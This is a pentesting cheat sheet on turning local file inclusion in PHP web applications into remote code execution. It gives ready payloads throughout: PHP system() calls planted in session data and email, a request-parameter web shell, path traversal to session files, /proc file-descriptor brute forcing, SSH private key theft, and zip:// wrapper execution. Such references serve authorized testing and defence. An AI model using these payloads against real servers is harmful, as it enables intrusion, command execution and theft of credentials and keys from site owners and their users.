LFI to RCE

Php sessions method

#Check if the website use PHP
SESSIDSet-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Tue, 30-Jun-2020 10:25:29 GMT; path=/; httponly

​#In php sessions are store into /var/lib/php5/sess_PHPSESSID files
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

#Set the cookie to <?php system("whoami"); ?>
login=1&user=<?php system("whoami");?>&pass=password&lang=en_us.php​

#Use the LFI to include the PHP session file
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2​

Email method

#Send a mail to internal account (user@localhost) containing:
<?php echo system($_REQUEST["cmd"]); ?>
#Access to the mail (/var/mail/USER&cmd=whoami)

/proc/*/fd/* method

#Upload a lot of shells
http://web.com/index.php?page=/proc/$PID/fd/$FD
#$PID = PID of the proccess (can be bruteforced)
#$FD = filedescriptor (can be bruteforced)

Ssh method

#Check which user is being used (/proc/self/status - /etc/passwd)
/home/hax0r/.ssh/id_rsa #hax0r = User is being used

Using a zip upload

1. Create a .php file (rce.php)
2. Compress it to a .zip file (file.zip)
3. Upload your .zip file on the vulnerable web application
4. Trigger the RCE:
https://site.com/index.php?page=zip://path/file.zip%23rce.php

Phpinfo() method

To exploit this you need: page where phpinfo() is displayed, "file_uploads=on" and the server has to be able to write in "/tmp" directory.

Last updated